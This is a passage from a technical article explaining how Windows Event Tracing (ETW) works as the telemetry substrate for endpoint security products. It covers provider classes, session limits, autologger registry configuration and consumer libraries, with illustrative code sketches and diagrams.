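A rough sketch of why dynamic enable is cheap for the producer, assuming a simplified filter: the event's level must not exceed the enabled level, and any overlap with the keyword bitmask passes. `ToyProvider` and its method names are hypothetical, and real ETW keyword matching has more cases than this model covers.

```python
class ToyProvider:
    """Illustrative provider: trace points are compiled in but gated at runtime."""

    def __init__(self):
        self.enabled = False
        self.level = 0         # most verbose level a session asked for
        self.any_keywords = 0  # keyword bitmask a session asked for
        self.emitted = []

    def enable(self, level, any_keywords):
        """What a controller's enable request boils down to in this model."""
        self.enabled, self.level, self.any_keywords = True, level, any_keywords

    def disable(self):
        self.enabled = False

    def write(self, level, keywords, build_payload):
        """Trace point: a cheap check first; the payload is built only if wanted."""
        if not self.enabled or level > self.level:
            return False
        if keywords and not (keywords & self.any_keywords):
            return False
        self.emitted.append(build_payload())
        return True
```

Passing the payload as a callable is a design choice of the sketch: while the provider is disabled, the trace point costs a flag test and nothing else, which is the property that lets trace points ship in production code.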

The fourth move was the trichotomy of providers, controllers, and consumers [@ms-etw-wdk]. Microsoft did not write ETW as an internal-only facility. From the start, third parties could write providers (driver authors instrumenting their own code), controllers (performance tools starting and stopping sessions), and consumers (analyzers reading event streams). The architecture is open by design.

Provider: A component that emits ETW events, identified by a GUID. A provider is registered with the system at runtime via the `EventRegister` API (or its predecessor `RegisterTraceGuids` for classic providers) and emits events via `EventWrite` (or `TraceEvent`). Providers ship inside Windows itself, inside Microsoft applications, and inside any third-party binary that wants to expose tracing.

Controller: A component that creates, configures, enables, and stops trace sessions. Controllers select which providers a session subscribes to and at which level and keyword bitmask. The Windows Performance Recorder, `logman`, `xperf`, and every EDR's session-management code are controllers.

Consumer: A component that reads events from a session in real time or from an `.etl` file on disk. Consumers register a callback that the system invokes once per delivered event. The Windows Performance Analyzer, the krabsetw library, SilkETW, and every EDR's sensor process are consumers.

flowchart LR
    Ctl[Controller<br/>StartTrace + EnableTrace] --> Sess[Trace Session<br/>per-session buffer pool]
    P1[Provider on CPU 0] --> CPU0[CPU 0 buffer]
    P2[Provider on CPU 1] --> CPU1[CPU 1 buffer]
    P3[Provider on CPU N] --> CPUN[CPU N buffer]
    CPU0 --> WT[Writer thread<br/>asynchronous drain]
    CPU1 --> WT
    CPUN --> WT
    Sess -.governs.-> CPU0
    Sess -.governs.-> CPU1
    Sess -.governs.-> CPUN
    WT --> File[(.etl file)]
    WT --> RT[Real-time consumer<br/>OpenTrace + ProcessTrace]

The original Windows 2000 implementation supported 32 trace sessions running simultaneously [@ms-etw-sessions], a number Microsoft later raised to 64 globally. ETW was framed as a developer-diagnostics facility -- the Windows Driver Kit primary still describes it that way [@ms-etw-wdk] -- and the security-telemetry use case did not exist for almost a decade.

But the design choices that made ETW good for low-overhead production diagnostics turn out to be exactly the design choices a security telemetry bus needs. Per-CPU buffers solve the multi-core throughput problem. Asynchronous writes solve the producer-latency problem. Dynamic enable solves the always-shipping-but-mostly-off problem. The trichotomy solves the third-party-extensibility problem. Twenty-five years later, every modern Windows EDR consumes telemetry through the same four primitives.

Windows 2000's 32-session global cap [@ms-etw-sessions] is preserved verbatim on the modern Microsoft Learn page: "Windows 2000: Supports only 32 event tracing sessions." The cap doubled to 64 in later releases and has stayed there ever since.

The 2000-era design carried one limit, however, that turned out to matter for security: only one trace session could enable a classic provider at a time. The next ten years would be defined by the consequences.

3. The MOF era: one session, one steal, one decade of coexistence pain

In 2005, a third-party performance monitor that registered a classic provider could find itself silently disabled the moment Microsoft's wprui.exe started its own session against the same provider GUID. The first session got no error. It just stopped receiving events. That second-consumer-steals-first behavior is the architectural fact of the entire 2000-2007 era.

Microsoft Learn still documents the rule in one sentence:

Note: "Up to eight trace sessions can enable and receive events from the same manifest-based provider. However, only one trace session can enable a classic provider. If more than one trace session tries to enable a classic provider, the first session would stop receiving events when the second session enables the provider." -- Microsoft Learn, Configuring and Starting an Event Tracing Session [@ms-etw-config]

That single rule made multi-EDR coexistence on classic providers structurally impossible. If Defender's predecessor and a third-party HIPS both wanted real-time process events from the same classic provider, they had to fight for it. The loser got silence with no notification.

The provider class involved was MOF-based, named after the schema language that described its events.

Managed Object Format (MOF): The schema description language inherited from WBEM (Web-Based Enterprise Management). For ETW, MOF files describe each event a classic provider can emit -- field names, types, tasks, opcodes -- and are compiled into the WMI repository at install time using `mofcomp`. Consumers decode events by querying the WMI repository for the matching MOF schema.

Classic provider: A synonym for *MOF provider*. The original ETW provider class introduced in Windows 2000. Registered with `RegisterTraceGuids`, emits events via `TraceEvent`, decoded against a MOF schema in the WMI repository. Capped at one trace session per provider.

The MOF model was workable for a single-consumer world. A performance-tuning team running an in-house tool could enable the provider, capture, and disable. As the substrate of a security stack with multiple agents on the same host, it could not work. The mid-2000s had not yet produced a "multiple agents on the same host" world, so the limit did not bite immediately. By 2007 it would.

Class	Era	Schema location	Sessions/provider	Adoption in 2026
MOF / classic	2000	WMI repository	1	Niche; mostly NT Kernel Logger
WPP	~2002	`.pdb` (TMF)	1	Pervasive inside Windows internals
Manifest-based	2007 (Vista)	XML manifest	8	Dominant for security telemetry
TraceLogging	2015 (Win10)	Inline (TLV)	8	Rising for new app/service code

A handful of classic providers survived the 2007 transition and are still significant. The most important is the NT Kernel Logger [@ms-etw-sessions], the special-purpose system session that captures high-throughput kernel events: file I/O, disk I/O, registry operations, network packets. On most consumer SKUs it remains the only path to those event streams at line rate. Sysmon and most kernel-level diagnostics tools use the NT Kernel Logger or its modern descendants.

The NT Kernel Logger is a system reserved logger. There is exactly one of it on a host, and the kernel itself owns the buffers. Tools that want kernel disk, file, registry, or network events at high throughput typically subscribe through it rather than through manifest providers. This is why a host can have eight Microsoft-Windows-Kernel-File consumers but cannot easily have two simultaneous full-fidelity disk I/O traces.

By 2007 Microsoft knew the one-session limit had to go. The fix shipped with Windows Vista in January 2007, and it was the central architectural decision of the entire ETW-as-EDR-substrate story.

4. Vista's eight sessions: the architectural decision that made the modern EDR endpoint possible

Park and Buch open their April 2007 MSDN Magazine article with the line that frames every later development:

On Windows Vista, ETW has gone through a major upgrade, and one of the most significant changes is the introduction of the unified event provider model and APIs. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

The new model raised the per-provider session cap from one to eight. That single number is why Defender, CrowdStrike Falcon, SentinelOne, Sysmon, and a researcher's SilkETW tap can all read Microsoft-Windows-Kernel-Process [@fireeye-silketw-launch] from the same host today without one of them stealing events from the others.

The Vista model also unified two things that had been separate. ETW providers wrote to per-CPU ring buffers; the Win32 Event Log was a different facility with its own writer, its own format, and its own consumers. Park and Buch describe the unification verbatim:

The new unified APIs combine logging traces and writing to the Event Viewer into one consistent, easy-to-use mechanism for event providers. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

After Vista, a single EventWrite call from a manifest-based provider lands both in the per-CPU ring buffer for ETW consumers and in the evtx channel for wevtutil and Group Policy audit consumers, depending on how the manifest's channel mappings are configured. The "Event Viewer" the user sees is now a consumer of ETW.

Manifest-based provider: The Vista-era ETW provider class. The provider author writes an XML manifest enumerating events, fields, tasks, opcodes, levels, keywords, and channels. The `mc.exe` message compiler turns the manifest into a binary resource embedded in the provider binary; `wevtutil im` registers the manifest with the system at install time. At runtime the provider calls `EventRegister` once per provider GUID and `EventWrite` per event. Capped at eight trace sessions per provider.

Channel: A logical destination for an event, declared in a manifest. The four standard channels are *Admin* (operational events for administrators), *Operational* (verbose events for operators), *Analytic* (high-volume events for diagnostics), and *Debug* (developer-only events). When the provider's `EventWrite` fires, the kernel demultiplexes by channel: events with channels enabled in the `evtx` configuration land in the corresponding channel log, while subscribed real-time consumers receive them through their session.

The deployment pipeline for a manifest-based provider is heavier than for a classic provider. The author writes a manifest, compiles it, embeds the resource, and runs wevtutil im at install time. Microsoft Learn calls out the distinction between provider registration and manifest installation [@ms-eventregister] explicitly, and notes that each process can register up to 1,024 providers [@ms-eventregister]. In practice few processes come close.

flowchart TD
    A[Author writes manifest.xml] --> B[mc.exe compiles to binary resource]
    B --> C[Resource embedded in provider .dll/.exe]
    C --> D[Installer runs wevtutil im manifest.xml]
    D --> E[System-wide manifest registry]
    F[Provider process at runtime] --> G[EventRegister GUID]
    G --> H[EventWrite per event]
    H --> I[Per-CPU ring buffer<br/>for ETW sessions]
    H --> J[Channel demux<br/>Admin / Operational / Analytic / Debug]
    J --> K[(.evtx log files)]
    I --> L[Real-time consumers]
    E -.decode metadata.-> L
    E -.decode metadata.-> K

The cap rules now read like this: eight trace sessions can enable a manifest-based provider concurrently [@ms-about-etw]; up to 64 sessions can run on the system at once [@ms-etw-sessions]; EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES when the per-provider cap binds [@ms-enabletraceex2]. The 8-session number was chosen for ergonomics, not for security planning, but it is the load-bearing number in modern Windows endpoint security.

Key idea: The eight-session cap on manifest-based providers is the single architectural decision that made multi-EDR coexistence on the same Windows host possible. Without it, the second EDR to subscribe to Microsoft-Windows-Kernel-Process would silently steal events from the first.
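The two cap behaviours can be put side by side in a small model. This is a sketch under stated assumptions: `ToyProviderRegistration` and the session names are hypothetical, and the only facts taken from the documentation quoted above are the caps themselves, the silent steal on classic providers, and the `ERROR_NO_SYSTEM_RESOURCES` return.

```python
ERROR_SUCCESS = 0
ERROR_NO_SYSTEM_RESOURCES = 1450  # Win32 error code value

SESSION_CAP = {"classic": 1, "manifest": 8}  # per-provider caps quoted above


class ToyProviderRegistration:
    """Tracks which sessions currently receive events from one provider."""

    def __init__(self, kind):
        self.kind = kind
        self.sessions = []

    def enable(self, session):
        if session in self.sessions:
            return ERROR_SUCCESS
        if len(self.sessions) < SESSION_CAP[self.kind]:
            self.sessions.append(session)
            return ERROR_SUCCESS
        if self.kind == "classic":
            # The newcomer wins; the first session goes quiet and gets no error.
            self.sessions = [session]
            return ERROR_SUCCESS
        return ERROR_NO_SYSTEM_RESOURCES  # a ninth subscriber is told no

    def receivers(self):
        """Sessions that would receive the provider's next event."""
        return list(self.sessions)
```

The difference that matters operationally is in the failure mode. In the classic case the displaced session sees nothing wrong, while in the manifest case the caller that does not fit gets an explicit error it can log.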

A 2007-era driver author shipping the inaugural Microsoft-Windows-Kernel-Process provider, GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}, authored a manifest declaring ProcessStart (event ID 1), ProcessStop (event ID 2), ImageLoad (event ID 5), and so on. Defender's MsMpEng.exe could subscribe; the future CrowdStrike Falcon could subscribe; the future Sysmon could subscribe; the future SilkETW researchers could subscribe. None starves another. The Vista unification is the architectural enabler of the modern multi-EDR Windows endpoint.

With multi-consumer concurrency solved, the next problems were authoring overhead and producer integrity. Two parallel paths branched off the Vista manifest model: TraceLogging for the first, the EtwTi PPL/ELAM gate for the second.

5. Two more provider classes: WPP for the kernel tree, TraceLogging for the app tier

Vista's manifest-based providers solved coexistence and decoding, but they were heavy to deploy. Microsoft shipped two more provider classes -- one older than Vista and one younger -- that traded manifest deployment for two different kinds of simplicity.

WPP: the C-preprocessor approach

WPP -- Windows software trace PreProcessor -- predates Vista. Community references and the Park & Buch description of ETW being "abstracted into the Windows preprocessor (WPP) software tracing technology" [@ms-park-buch-2007] place its first WDK ship in the Windows XP era; no Microsoft primary pins a specific build. It became the standard tracing facility inside the Windows kernel tree itself for years. The WDK page [@ms-wpp] frames its purpose:

"WPP software tracing supplements and enhances WMI event tracing by adding ways to simplify tracing the operation of the trace provider. It is an efficient mechanism for the trace provider to log real-time binary messages."

A WPP provider is authored in C with macros that look like printf calls. The C preprocessor expands DoTraceMessage(FlagId, "Frobnicating widget %d", widgetId) into a classic trace-message call (the `TraceMessage` family rather than the manifest-era `EventWrite`) against an auto-generated provider GUID. Format strings are extracted at build time into a Trace Message Format file embedded in the binary's .pdb. The producer cost is the smallest of any ETW provider class: emitting an event is a function call plus a few stores into a buffer. There is no manifest to deploy, no XML to author.

The corresponding decode cost is the highest. A WPP event arrives at the consumer as a binary payload referencing a TMF identifier. To turn that into a human-readable message the consumer needs the producer's .pdb file. If you do not have the symbols for the binary that emitted the event, you do not know what the event means.
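The dependency on symbols can be sketched in a few lines. The dictionary layout below is an assumption for illustration, not the real TMF or event wire format; the only point it makes is that the event carries identifiers and raw arguments while the format string lives elsewhere.

```python
def decode_wpp_event(event, tmf_formats):
    """Return the formatted message, or None when no format string is available."""
    key = (event["message_guid"], event["message_number"])
    fmt = tmf_formats.get(key)
    if fmt is None:
        return None  # no symbols: the payload stays an opaque blob
    return fmt % tuple(event["args"])


# Hypothetical event as a consumer might see it: identifiers plus raw arguments.
event = {"message_guid": "hypothetical-guid", "message_number": 10, "args": [7]}

# Format table of the kind that would be recovered from the producer's .pdb.
tmf_formats = {("hypothetical-guid", 10): "Frobnicating widget %d"}
```

Calling `decode_wpp_event(event, tmf_formats)` recovers the readable message, while calling it with an empty table returns `None`, which is the position of any consumer that lacks the producer's symbols.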

That decode cost is why WPP did not become the EDR substrate. Sealighter's README puts the operational consequence verbatim:

"WPP traces compounds the issues, providing almost no easy-to-find data about provider and their events." -- Sealighter README [@gh-sealighter]

WPP: A C-preprocessor-based ETW authoring path inherited from the XP-era WDK. Format strings are extracted to a TMF resource that lives in the producer's `.pdb`. Producer cost is minimal; decode cost requires the producer's symbol files. WPP providers inherit the classic one-session-per-provider cap and are pervasively used inside Windows itself for in-tree dev-time tracing.

WPP providers also inherit the classic one-session-per-provider cap [@ms-about-etw], which would have made them unworkable for multi-EDR consumption even if the decode problem were solved. So WPP became the kernel-tree internal tracing facility -- ubiquitous inside Microsoft's source tree, irrelevant outside it.

TraceLogging: schema in the payload

Eight years after Vista, in Windows 10 (2015), Microsoft shipped a parallel path that solved a different problem. TraceLogging [@ms-tracelogging-about] keeps the eight-session cap of manifest providers but eliminates the manifest deployment burden:

"TraceLogging is a system for logging events that can be decoded without a manifest." -- Microsoft Learn, About TraceLogging [@ms-tracelogging-about]

A TraceLogging event carries its own schema inline. The event payload is a sequence of type-length-value triples: a one-byte type tag, a length, and the data. A consumer that has never seen the provider before can still decode the event because the names and types of every field are in the event. The provider author needs no XML manifest, no mc.exe, no wevtutil im.

The trade-off is per-event size. Inline schema strings cost bytes per event. For a high-volume provider emitting millions of events per minute, the per-event size matters and a manifest-based provider is correct. For a new component author who wants tracing without an install-time deployment dance, TraceLogging is the right answer.
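To make the size trade-off concrete, here is a minimal sketch of a self-describing encoding next to a values-only one. The layout (null-terminated field name, one-byte type tag, two-byte length, data) and the tag values are assumptions chosen for illustration; they are not TraceLogging's actual wire format.

```python
import struct

TYPE_U32, TYPE_STR = 1, 2  # hypothetical type tags, not TraceLogging's real values


def encode_self_describing(fields):
    """Each field carries its own name, type tag, and length ahead of the data."""
    out = bytearray()
    for name, value in fields:
        if isinstance(value, int):
            tag, data = TYPE_U32, struct.pack("<I", value)
        else:
            tag, data = TYPE_STR, value.encode("utf-8")
        out += name.encode("utf-8") + b"\x00"
        out += struct.pack("<BH", tag, len(data))
        out += data
    return bytes(out)


def decode_self_describing(blob):
    """Decode with no out-of-band schema: everything needed is in the blob."""
    fields, pos = [], 0
    while pos < len(blob):
        end = blob.index(b"\x00", pos)
        name = blob[pos:end].decode("utf-8")
        tag, length = struct.unpack_from("<BH", blob, end + 1)
        start = end + 4  # skip the terminator, the tag byte, and the 2-byte length
        data = blob[start:start + length]
        value = struct.unpack("<I", data)[0] if tag == TYPE_U32 else data.decode("utf-8")
        fields.append((name, value))
        pos = start + length
    return fields


def encode_values_only(fields):
    """Manifest-style stand-in: names and types live out of band, only values ship."""
    out = bytearray()
    for _name, value in fields:
        if isinstance(value, int):
            out += struct.pack("<I", value)
        else:
            out += value.encode("utf-8") + b"\x00"
    return bytes(out)
```

For a two-field event such as `[("ProcessId", 4242), ("ImageName", "cmd.exe")]`, the self-describing form in this sketch is roughly three times the size of the values-only form. That overhead repeats on every event, which is why the choice tilts toward a manifest at high volume.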

TraceLogging: A self-describing ETW provider class shipped in Windows 10. Schema is inline in each event payload as type-length-value triples; consumers decode without a manifest. Available from C/C++ via `TraceLoggingProvider.h`, from .NET via `EventSource` with `EtwSelfDescribingEventFormat`, and from WinRT via `LoggingChannel`. Inherits the eight-session cap from the manifest-based class.

TraceLogging is also the unified path across runtimes. The same self-describing payload format is emitted from native C/C++, from .NET (when an EventSource opts into EtwSelfDescribingEventFormat), and from kernel-mode drivers [@ms-tracelogging-portal]. A consumer using TDH (the Trace Data Helper API) decodes them without distinguishing between the runtime that emitted them.

Four classes, four trade-offs

Class	First Shipped	Schema Location	Sessions/Provider	Decode without symbols/manifest?	Best for
MOF / classic	2000	WMI repository (`mofcomp`)	1	Needs MOF	Legacy components; NT Kernel Logger
WPP	~2002	`.pdb` (TMF)	1	No -- needs producer PDB	In-tree Windows kernel dev-time tracing
Manifest-based	2007 (Vista)	XML manifest, system-installed	8	Needs installed manifest	Shipping security telemetry
TraceLogging	2015 (Win10)	Inline TLV in payload	8	Yes	New apps and services; cross-runtime

Sources for the table: [@ms-about-etw, @ms-etw-config, @ms-tracelogging-about, @ms-wpp].

For new shipping Windows components with a known event vocabulary and high volume, choose manifest-based: smallest per-event size, evtx integration, eight-consumer concurrency. For new cross-runtime open-source providers where deployment friction matters, choose TraceLogging: same eight-consumer concurrency, no XML to author, decodable everywhere. For in-source-tree dev-time tracing inside a binary you already have symbols for, WPP is fine. For new security-relevant providers, never choose classic: the one-session cap is structurally incompatible with multi-EDR coexistence.

Four provider classes, four trade-offs. But every one of them shares a structural weakness: the producer fires from inside the calling process, and any code in that process can patch the runtime entry-point and silence the provider for itself. That is the weakness Adam Chester made famous in 2020, and the one EtwTi was built to defeat.

6. Sessions, buffers, and the autologger registry: where the telemetry actually lives

Open regedit on a Windows host and navigate to HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger. You are looking at the persistence surface of every trace session that survives a reboot on this machine -- and the persistence surface every modern EDR uses to install itself.

A session is the unit ETW actually exposes to controllers. It owns a per-session pool of buffers, a writer thread, a destination (file or real-time consumer), and a list of providers it has subscribed to. The lifecycle is short. A controller fills out an EVENT_TRACE_PROPERTIES structure [@ms-event-trace-props] with a session name, buffer size, logging mode, and destination, then calls StartTrace. The kernel allocates the buffers -- at least two per logical processor [@ms-event-trace-props] -- and returns a session handle. The controller then calls EnableTraceEx2 [@ms-enabletraceex2] for each provider it wants to subscribe to, passing EVENT_CONTROL_CODE_ENABLE_PROVIDER along with the provider GUID, level, and keyword bitmask.

If the provider's per-class session cap is already saturated, EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES. If the caller lacks the privilege to enable that provider, it returns ERROR_ACCESS_DENIED. We will see both error codes again later, on different paths.

The default buffer size sweet spot is small. The Microsoft Learn primary states it explicitly: "Trace sessions with large buffers (256KB or larger) should be used only for diagnostic investigations or testing, not for production tracing." [@ms-event-trace-props] Production session buffer sizes typically sit in the 32-64KB range.
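The buffer arithmetic is easy to work through. The sketch below assumes a simple worst-case estimate of buffer count times buffer size; the function name and the returned keys are hypothetical, and the kernel may round or adjust the values a controller requests.

```python
def session_footprint(logical_processors, buffer_size_kb, maximum_buffers=0):
    """Estimate a session's buffer floor and worst-case buffer memory."""
    minimum_buffers = 2 * logical_processors  # floor cited in the text
    buffer_count = max(minimum_buffers, maximum_buffers)
    return {
        "minimum_buffers": minimum_buffers,
        "worst_case_kb": buffer_count * buffer_size_kb,
        # 256KB or larger is the range the documentation reserves for diagnostics.
        "diagnostic_only": buffer_size_kb >= 256,
    }
```

On a 64-processor host with 64KB buffers, the floor alone is 128 buffers and 8MB of buffer memory for one session, which is one reason production sessions keep individual buffers small.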

There are three logging modes. File mode writes events to a sequential .etl file on disk; the writer thread drains buffers to disk and the file grows. Circular mode writes to a fixed-size file in a circular buffer; old events are overwritten when the file fills. Real-time mode delivers events to a real-time consumer process via a kernel callback. Defender, EDR sensors, and Sysmon all use real-time mode for their hot paths; they may also write to file as a forensic backup.

Real-time consumer: A process that calls `OpenTrace` with `LogFileMode = EVENT_TRACE_REAL_TIME_MODE` and receives events live via a registered callback rather than from an `.etl` file on disk. Real-time consumers must keep up with producer rate or events are lost.

The autologger registry path is what makes a session survive a reboot. A subkey under HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\<SessionName> defines a session that the kernel starts at boot, before most user-mode services are running. Each subkey's values configure the session: BufferSize, MaximumBuffers, LogFileMode, FileName, plus a nested <SessionName>\<ProviderGuid> subkey for each provider to enable.

Autologger: A registry-persisted boot-time ETW session. The kernel reads `HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\` at boot, creates the session, enables the configured providers, and begins capture before user-mode services start. Defender's Sense agent, CrowdStrike's Falcon sensor, and Sysmon's driver all install autologgers here.

Defender's DiagTrack, Microsoft-Windows-Diagnosis-PCW, the SQM kernel logger, the EventLog-Application channel autologger -- all live here (observable via logman query -ets on a stock Windows install). Third-party EDRs add their own. The Palantir CIRT taxonomy [@palantir-tampering-wayback] (about which more in section 11) frames this registry surface as the persistent-tampering target: an attacker who can write to this subtree can disable an EDR's boot-time tracing without ever interacting with the running EDR process. The events of interest never get captured because the session never starts.

There is a related concept worth naming: the Global Logger. This is a special autologger session whose configuration lives in HKLM\SYSTEM\CurrentControlSet\Control\WMI\GlobalLogger. It is the boot-time tracing path that comes online before any user-mode service, including before Sense and the EDR sensor. It exists to capture early-boot kernel events that no later session can record.

flowchart TD
    R[HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\] --> S1[DiagTrack-Listener]
    R --> S2[Defender-Listener]
    R --> S3[ThirdPartyEDR-Sensor]
    R --> SG[GlobalLogger]
    S2 --> S2P[Provider GUIDs subkeys]
    S2 --> S2C[BufferSize / MaximumBuffers / LogFileMode]
    S2 --> S2F[FileName=.etl path]
    S2P --> KS[Kernel reads at boot]
    S2C --> KS
    S2F --> KS
    KS --> Started[Session started before user-mode services]

Note: logman query -ets enumerates every live trace session on the host. Cross-reference against the subkeys in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ to find sessions configured to start at boot. Any unauthorised entry -- a session you do not recognise, an autologger pointed at a destination outside your EDR's data path, a provider GUID you cannot account for -- belongs in your incident response queue. We return to this in section 14.
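The cross-reference in that note can be sketched as a small audit function. It works on plain dictionaries so the logic is visible on its own; on a real host the `configured` input would have to be populated from the Autologger subtree (for instance with Python's standard `winreg` module). The dictionary shapes and the reason strings are assumptions of this sketch.

```python
def audit_autologgers(configured, allowlist):
    """Compare configured autologger sessions against what the fleet expects.

    configured: {session_name: {"providers": [guid, ...], "FileName": path}}
    allowlist:  {session_name: {"providers": {lowercase guid, ...}, "log_dir": path}}
    Returns a list of (session_name, reason) findings.
    """
    findings = []
    for session, config in configured.items():
        expected = allowlist.get(session)
        if expected is None:
            findings.append((session, "unrecognised session"))
            continue
        for guid in config.get("providers", []):
            if guid.lower() not in expected["providers"]:
                findings.append((session, "unexpected provider " + guid))
        file_name = config.get("FileName", "")
        if file_name and not file_name.lower().startswith(expected["log_dir"].lower()):
            findings.append((session, "log file outside expected path"))
    return findings
```

An empty result means every configured session, provider GUID, and log destination matched the allowlist. This sketch only checks what is present; a session that should exist but is missing from `configured` would need a separate check.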

ERROR_NO_SYSTEM_RESOURCES from EnableTraceEx2 is the runtime symptom of the eight-session cap binding [@ms-enabletraceex2]. SOC engineers debugging multi-EDR coexistence problems should look for it in their sensor's diagnostic output. Eight subscribers per manifest provider is enough for the typical Defender + third-party EDR + Sysmon + research tap arrangement, but a host running multiple research-mode tracers can saturate it.

Persistence solved: a session the OS starts at every boot. But who reads it? That requires a consumer process, and consumers are where the architecture forks along the security spectrum.

7. Consumer architecture: from `OpenTrace` to KrabsETW to a 30-line process watcher

The consumer side of ETW is mechanically simple -- three calls to open a trace, register a callback, and process events -- but the choice of library tells you almost everything about what kind of EDR you are building.

The native pattern is three Win32 calls. EnableTraceEx2 subscribes the session to a provider GUID with a level and keyword bitmask. OpenTrace returns a handle on the session for consumption. ProcessTrace blocks the calling thread, drains events from the kernel's per-CPU buffers, and dispatches each one to a registered callback. Each event arrives as an EVENT_RECORD containing a header (provider GUID, event ID, level, keyword, opcode, timestamp, process ID, thread ID) and a payload that the consumer decodes.

For manifest providers the consumer decodes via TDH (the Trace Data Helper API) against the system-installed manifest. For TraceLogging providers the consumer decodes from the inline TLV payload. For classic and WPP providers the consumer needs the MOF schema or the producer's PDB respectively.
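The callback-dispatch shape of a consumer can be modelled without touching the Win32 API. In the sketch below, `ToyEventRecord` keeps only a few of the header fields listed above, the payload is assumed to be already decoded into a dictionary, and `process_trace` iterates over a list instead of blocking on a live session. All of the class, method, and field names are hypothetical.

```python
from dataclasses import dataclass

# Microsoft-Windows-Kernel-Process GUID as quoted earlier in this article.
KERNEL_PROCESS = "{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}"


@dataclass
class ToyEventRecord:
    provider_guid: str
    event_id: int
    process_id: int
    payload: dict  # assumed already decoded; a real consumer would decode here


class ToyConsumer:
    def __init__(self):
        self.handlers = {}

    def on(self, provider_guid, event_id, callback):
        """Register one callback per (provider, event ID) pair."""
        self.handlers[(provider_guid, event_id)] = callback

    def process_trace(self, events):
        """Stand-in for the blocking drain loop: one callback per matching event."""
        delivered = 0
        for record in events:
            callback = self.handlers.get((record.provider_guid, record.event_id))
            if callback is not None:
                callback(record)
                delivered += 1
        return delivered
```

A handler registered for event ID 1 on `KERNEL_PROCESS` would see each ProcessStart record and nothing else. Events with no registered handler are skipped, which mirrors how a real consumer ignores event IDs it has no detection logic for.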

Trace Data Helper (TDH): The Win32 decoder API that turns a raw `EVENT_RECORD` payload into typed fields, using the registered manifest as the schema source. `TdhGetEventInformation` returns a `TRACE_EVENT_INFO` structure with the field names, types, and offsets; `TdhFormatProperty` extracts each field. TDH is what makes manifest events self-describing at the consumer end, even though the schema lives out of band.

sequenceDiagram
    participant C as Consumer process
    participant K as Kernel ETW subsystem
    participant P as Provider process
    C->>K: StartTrace(session)
    C->>K: EnableTraceEx2(session, providerGuid, level, keyword)
    K-->>P: Provider notified to begin emitting
    C->>K: OpenTrace(session)
    K-->>C: TraceHandle
    C->>K: ProcessTrace(handle) [blocking]
    P->>K: EventWrite(payload)
    K-->>C: callback(EVENT_RECORD)
    P->>K: EventWrite(payload)
    K-->>C: callback(EVENT_RECORD)
    Note over C,K: ProcessTrace returns only when session ends

In production almost no one writes the raw three-call pattern. The library universe settled into a small set of widely-used wrappers, and the choice of wrapper maps almost one-to-one onto the kind of EDR the engineering team is building.

krabsetw [@gh-krabsetw] is a Microsoft-authored C++ library that simplifies session and provider management. Its README explicitly notes the production caller: a C++/CLI wrapper called Microsoft.O365.Security.Native.ETW, "used in production by the Office 365 Security team. It's affectionately referred to as Lobsters." If you are building an in-house EDR or a security analytics pipeline in C++ on Windows, krabsetw is the default choice.

Microsoft.Diagnostics.Tracing.TraceEvent [@nuget-traceprocessing] is the general-purpose .NET ETW library, distributed as a NuGet package and used heavily inside the .NET diagnostics community. Microsoft's separate Microsoft.Windows.EventTracing.Processing.All package is the .NET TraceProcessing API [@ms-etw-portal] that the Windows engineering team uses internally to analyze ETW data from its own engineering system.

SilkETW [@gh-silketw], originally released by Ruben Boonen at FireEye in March 2019 [@fireeye-silketw-launch] (now maintained by Mandiant), wraps Microsoft.Diagnostics.Tracing.TraceEvent to expose ETW telemetry to detection-engineering and threat-hunting workflows. SilkETW is the canonical "blue team research" consumer: the tool you reach for when you want to see what events a provider actually emits without writing C++.

Sealighter [@gh-sealighter], by pathtofile, is a krabsetw-wrapping C++ tool that makes multi-provider subscription and filtering tractable from a JSON config. The README states: "Sealighter leverages the feature-rich Krabs ETW Library to enable detailed filtering and triage of ETW and WPP Providers and Events." Sealighter is the canonical "red/blue team triage" consumer: more flexible than SilkETW, less code to write than raw krabsetw.

The pitfalls are universal across all four libraries. The krabsetw README spells two of them out:

"The call to 'start' on the trace object is blocking so thread management may be necessary." -- [@gh-krabsetw]

"Throwing exceptions in the event handler callback ... will cause the trace to stop processing events." -- [@gh-krabsetw]

Both have caused real production outages. An EDR that throws an unhandled exception in its event callback dies silently as an ETW consumer, and the next event the provider emits goes nowhere.

The "throwing in the callback stops the trace" pitfall is the gotcha that bites every team writing their first ETW consumer. The kernel does not catch the exception; the trace simply ends. A production-quality consumer wraps every callback in try/catch (or its language equivalent) and routes failures through a side channel, not through the trace itself.
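The wrap-every-callback advice can be factored into one reusable guard. The sketch below is a minimal illustration under stated assumptions: `SketchEventRecord`, `SketchHandler`, and `guardHandler` are hypothetical names, the record shape is a simplified stand-in for `EVENT_RECORD`, and the side channel is just an in-memory array.

```typescript
// Simplified stand-in for the data a handler receives (not the real EVENT_RECORD).
interface SketchEventRecord {
  providerGuid: string;
  id: number;
  fields: Record<string, unknown>;
}

type SketchHandler = (record: SketchEventRecord) => void;

// Wraps a handler so that no exception can escape into the trace machinery.
// Failures are handed to reportFailure, which plays the role of the side channel.
function guardHandler(
  handler: SketchHandler,
  reportFailure: (error: unknown, record: SketchEventRecord) => void,
): SketchHandler {
  return (record) => {
    try {
      handler(record);
    } catch (error) {
      try {
        reportFailure(error, record);
      } catch {
        // The side channel itself failed; swallow so the trace keeps running.
      }
    }
  };
}

// Usage: the second record triggers a handler bug, yet nothing propagates.
const failures: string[] = [];
const guarded = guardHandler(
  (record) => {
    if (record.id === 2) throw new Error("parser bug");
  },
  (error) => failures.push(String(error)),
);
guarded({ providerGuid: "{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}", id: 1, fields: {} });
guarded({ providerGuid: "{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}", id: 2, fields: {} });
```

The inner try/catch around the side channel is a design choice of this sketch: a logging failure should not be allowed to do what the original exception was prevented from doing.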

